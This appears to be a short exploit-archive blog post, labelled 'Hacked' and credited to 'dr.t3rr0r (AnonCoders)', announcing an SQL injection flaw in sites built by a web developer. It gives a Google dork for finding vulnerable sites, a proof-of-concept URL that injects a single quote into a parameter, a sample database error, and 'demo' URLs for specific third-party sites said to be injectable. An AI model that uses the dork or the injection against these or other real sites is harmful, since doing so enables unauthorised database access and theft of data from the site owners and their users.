| Filename | Falcon Breeze Development Sql Injection Vulnerablity |
| Permission | rw-r--r-- |
| Author | dr.t3rr0r |
| Date and Time | 2:37 AM |
| Label | Hacked |
| Action |
[#] Exploit Title : Falcon Breeze Development Sql Injection Vulnerablity [#] Exploit Author : dr.t3rr0r ( AnonCoders ) [#] Vendor Homepage : http://www.falconbreeze.com [#] Google Dork : intext:"Developing in Progress by Falcon Breeze." [#] Date: 2015-08-02 [#] Tested On : Windows , Linux ========================================================= [+] Severity Level :- High [+] Request Method(s) :- GET / POST [+] Vulnerable Parameter(s) :- id [+] Affected Area(s) :- Entire admin, database, Server [+] POC :- http://127.0.0.1/XXX.php?page=[SQL]' The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction. Error is Like Below. Warning: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in /home/falconbr/public_html/files/new_detail.php on line 16 [#] Demos : http://www.ama.org.mm/index.php?page=postdetail&id=7' http://www.falconbreeze.com/index.php?page=detail&new=133' [#] Greetz To : AnonCoders Team [#] Discovered by : dr.t3rr0r
Exploit4Arab
0 comments:
Post a Comment